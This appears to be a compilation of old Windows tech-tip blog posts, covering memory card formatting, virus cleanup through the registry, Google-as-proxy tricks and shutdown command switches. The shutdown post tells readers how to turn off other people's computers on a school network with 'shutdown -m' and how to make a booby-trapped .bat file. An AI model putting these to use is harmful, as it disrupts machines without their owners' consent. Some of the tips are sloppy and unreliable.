Recovering damaged memory card

Correct Treatment of your MMC: Physically, memory cards are quite fragile pieces of high technology, susceptible to damage from various silly things like excessive heat, condensation, strong magnetic fields, physical damage from rough handling and/or bending! (similar to most electronic devices then..) Given the natue of mobile memory card products, they are constantly being taken in and out of some form of interface with a mobile phone, a camera, a laptop, or desktop PC, or a separate memory card reader. The number of different devices they have to be able to interact with is in the thousands. It is not too surprisingly, then that sometimes the state of the file system on the memory card can get damaged. This may happen for a number of different reasons, including: > removing the card from a device whilst an application is trying to read/write to it.. (Just be patient…) > battery drain on a device whilst in use meaning an insufficent voltage failure whilst writing to the card. > a poor implementation of the MMC standard on the device using the card > poor connectivity software drivers on the device or the Windows PC/Mac > physical damage like card or device being dropped, bent, getting wet etc… > lots of others i am sure.. As often as not, the problem is not terminal for your memory card, but just a software issue ( or in physical terms, it could be called “a temporary disalignment of the all the bits and bytes on the card”). The fix for this problem is the same as for any other file storage device (like a floppy or hard drive) with corrupt or invalid file system, namely; re-format the file system. Re-Formatting your MobyMemory MMC Card: It is possible that your mobile will offer you the option of formatting the memory card if it is found to be invalid. (However, the likes of Nokia nGage, Nokia 6600, and Siemens Sx1 often just prefer to reject the media as corrupted). In that case, to format the card, you will need access to one or more of the following: > A Windows PC or Mac. > A separate multi-format memory card reader (verify that it is compatible with the MultiMediaCard -MMC- standard). > (This can come in USB or PCMCIA flavours. If USB, try and ensutre it is a USB2 device. > Alternatively, many of the newest laptop and desktop PCs now come with integrated Multi-format memory card readers. > If you are using a separate memory card reader, then connect it up to your PC, and let windows recgnize the device through plug-and-play. Now you can insert your MobyMemory card into the appropriate slot in the memory card reader. (Please note that because the MMC card is pretty much symmetrical it is very easy to insert it upside-down in the slot). Open up [Windows Explorer] (or the equivalent for MAC users..sorry not well-versed in OS X). There should be at least one icon visible for a [Removable Drive] in the list of available drives. (in fact, there is often a list of about 5 or 6 Removable drives, one for each of the different Memory card formats that your reader is compatible with). Find the drive that is mapped to the MMC card by clicking on each in turn until it confirms there is a drive present. (Sometimes it is easiest to do this by trying a fully-functional MMC card in the MMC slot first so you can confirm which drive letter it is.) (NB. It will always be labelled as a [Removable Drive], don’t mistake it for one of your PC hard drives like [C:] drive, as that could be catastrophic later on!) At this stage it may give an error message saying that the drive is unreadable. By right-clicking on the drive letter, it will provide the option of formatting the drive. Select format the drive, and the [Format Drive] dialog will appear (Double-check again to make sure it not your [C:] drive!). There is only one setting to focus on in this page, and that is to ensure that the FileSystem selected for formatting is the [FAT] option (not FAT32, or NTFS or any other option) (Note: All mobile phones, to my knowledge, and most cameras (etc..) use the FAT file system (or at least are compatible with it) on their memory card media.) Now click on Format Now ( ensure [Quick Format] is not selected as this will not actually restore the file system space byte by byte, but only resets the header information so the drive thinks its empty again. This may not be enought to solve your corruption problem.) The PC will now – hopefully!- chug away happily until it has restored the memory card space back to its original configuration (of course, any information on there is long gone by now!). If you recieve an error message back from the [Format Now] request, then your problem may be more permanent, and not just a software issue. In this case, it may still respond to a format request in a different memory card reader or device. If you believe it to be a failure of manufacture, then the warranty on the card offers the prospect of a replacement card, subject to a confirmation of the fault upon return of the goods.

Hidden files not showing??

I was facing problem of not showing hidden files even I choose option to show it in the explorer. This problem started since I burrowed pendrive from my friend. This was actually caused by virus. I don’t know the specific virus but it is of course either visual basic script or and executable file. That actually changed my registry setting of the hidden files in windows registry so even if u change the option to show Hidden files in the folder options ,you cannot see the hidden files in your system.This is done to protect the virus files which are hidden too.So you need to correct the registry setting to see the hidden files. Oh damn it, that virus also modified my registry value to disable Task manager and Registry Editor(The solution to this problem has already been posted). To do that follow these steps Run Registry Editor by typing regedit in run In the Registry travase to this path HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced Then double click the value Hidden in the right hand side pan A dialog box pops up asking for the datavalue.The virus would have changed the value to 0 which should be 1 – Show hidden 2 – Don’t show Once you have done this,you can even remove the virus files just by deleting the hidden virus files in explorer itself.

How to use Google as proxy browser

Many jobs and schools (countries?) block access to certain sites. However, it is very difficult for anybody to block access to google. By using google with either of these two methods, you can gain access to blocked sites very easily. Blocked web site, huh? Need a proxy? I am not a big fan of chasing free, open proxies all over the place. I use google instead. Here I describe what I believe is an uncommon way for bypassing blocked sites using google. 1: The first and most common way of using google to bypass blocked sites is just to search for the site and then clicked the “cached” link that appears on google. Easy, simple, and frequently works for static information. 2: Passing the site through google translator works well as well. Here’s the URL to use: Code: http://www.google.com/translate?langpair=en|en&u=www.blockedsite.com (where blockedsite.com is the site that you wish to visit) This translates the site from english to english and works because the ip address will appear as google instead of you. Here’s a link to tech-recipes passed through the translator as an example. You can actually do this with any langpair. Change en|en in the URL above to spanish by using es|es and it still works. 3:Unique method that I have not seen described before is to search through google mobile. Google mobile will “convert as you go” very similiar to the translation method above.

Enabling and aborting shutdown

Hmm, Long day, I stayed untouched with the internet and computer. I am back now. Need to tell something to you. ReAd ThE aRtIcLe BeLoW aBoUt ImPlEmEnTiNg ShUtDoWn AnD dIsAbLiNg. We all know the easiest way to shut down your computer is to type (shutdown –s) in to cmd “command” and that will give a message that the computer will shutdown and you have 30 seconds. But if u just type (shutdown -a) it will abort the shutdown but there are other commands. ill just start off doing the easiest 1 Shutdown –s it will shutdown your computer in 30 seconds and display a message shutdown –s –t 40 it will shutdown in 40 seconds but you can only go up to 86400 (24 hours) but if you make it 0 it will show no message and just shutdown shutdown –s –c ”haha the computer is going to shutdown” it will shutdown with a message in a box under the time shutdown –l it will just log you of the computer shutdown -i it will display the GUI shutdown window shutdown –r will restart the computer shutdown –a it will abort the shutdown shutdown –f will force all running applications to close I m not much confident about how to use (shutdown –d) so I just grab this of the net -d [u] [p]:xx:yy The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536) and now the fun stuff starts to begin if you still go to school or uney with the “-m” command the –m command will let you shut down computers on the network and all you need is the ip address or the computer name (its found in the system info in the “computer name” tab)(right click on my computer and go to properties and you will see “computer name”) once your have the ip or the computer name just type (shutdown –s –m \”ip/computer name” in to cmd but you can use all the command with it but you carnet use “-l” over the network it doesn’t let u and now to tern it in to a file so who ever opens it, it will make the computer shutdown just type what ever you want the computer to do in to a notepad file and save it as a .bat file(go to save as and (what ever name u want) and type .bat at the end)

Uninstalling windows from command prompt

Double Click does not open Drive(Autorun virus)

Alternative method to remove autorun.inf virus or ms32dll.dll.vbs 1-2. double click on My computer on Desktop , - choose Tool and select “Folder options” - click on “View” tap select “Show Hidden files and folders” and un hake “Hide Extention….” - and “Hide protected operating system file” (this selections are important to find the files you need to delete) - then click “OK” 3. open Windows Task Manager (ctrl-alt-del) and select the “Processes” tap - Click on “Image name” to sort File - find “wscript.exe” and click on “End Process” (if there is more than one process with that name you have to end all of them) - close the “Task Manager” 4. then you will click on Start and select “Search” and search for “autorun.inf” (Search the computer) - you will then delete all the files that contains the text MS32DLL.dll.vbs (the virus) by pressing: SHIFT + DELETE. (There of course should not be Autorun.inf in the C rooth). 5. you will also delete the virus from the system (C:WINDOWS MS32DLL.dll.vbs) by pressing: SHIFT + DELETE 6. Next step is to edit the Register (Like always you have to be very care fool in the registry tools. Some mistake there can crash your computer) - first, click on “Start” and select “Run” and type in “Regedit” and press “Enter”. - select HKEY_LOCAL_MACHINE –> Software –>Microsoft –>Windows –> Current Version –> Run. - find there “MS32DLL” and delete that entry. 6. Then select HKEY_CURRENT_USER –> Software –> Microsoft –> Internet Explorer –> Main. There you find “Window Title “Hacked by Godzilla”" and you should delete that entry. You can close the registry now. 7. next you will click on Start –> Run and type in “gpedit.msc” and press “Enter”. then you will open “Group Policy”. - there you will select User Configuration –> Administrative Templates –> System –> and there you will double click on “Turn Off Autoplay” - in the window there you should select “Enabled” and select “All drives” (they say in this Thai webside that select all turn of Autoplay will be safer for not getting viruses). Now you can close the Group Policy. 8. Next you will click on Start –> Run and type “msconfig” and press “Enter”. - you will open “System Configuration Utility”. - click on “Startup” tap - find the file MS32DLL, choose Enable All, then unhake “MS32DLL” - click Apply then OK to close - then you will exit the “System Configuration Utility” and select “Exit Without Restart” when prompt. 9. After this you double click on My Computer and select “Tools” and “Folder Options” and “View” tap to change back there. - select “Hide Extention…” and “Hide protected operating system file” and “Don’t show hidden files and folders”. - then you will empty the “Recycle bin” and “Restart” your computer.

Cell phone service at the top of the world

Mobile phone services will soon be available on top of Mt Everest, the world’s tallest peak. The service, which will operate on both GSM and CDMA handsets, will be introduced by Nepal Telecom (NT), Nepal’s largest telecom company. They will commence the service by mid-June this year. NT is extending its cell phone network to the top of the world with the help of a satellite antenna, which will soon be installed in Gorak Shep, located at an altitude of 5,160 meters. NT has installed satellite antennas in around seven locations in the Mt Everest region, including Lukla and Namche Bazar, located at 2,800 meters and 3,440 meters above sea level, respectively. They claimed that they can smoothly handle around 3,000 calls at once. If GSM and CDMA is available then internet is available via GPRS. Install Flash player in Google Chrome

Google Chrome is yet another awesome browser in the history of internet. Yesterday I was checking back my infant websites. One of them was my flash based website. When I tried opening that website, nothing appeared on the site except blank page. I researched a bit about the problem. Then I found out that, Google Chrome does not support flash based websites or flash contents. But however, if you want to run flash files on Google Chrome, you have to manually configure it with flash plugin for Chrome. Here are the instructions for installing Flash Player on Google Chrome: Download flash player for Windows. Rename the downloaded file to flash.zip. Extract the Zipped file to a folder. Select and copy flashplayer.xpt and NPSWF32.dll from the extracted folder. Navigate to Google Chrome plugins folder. Normally, it is C:/Documents and settings/Local Settings/Application Data/Google/Chrome/Application/Plugins Paste both copied files in Google Chrome plugins directory. Restart Google Chrome.
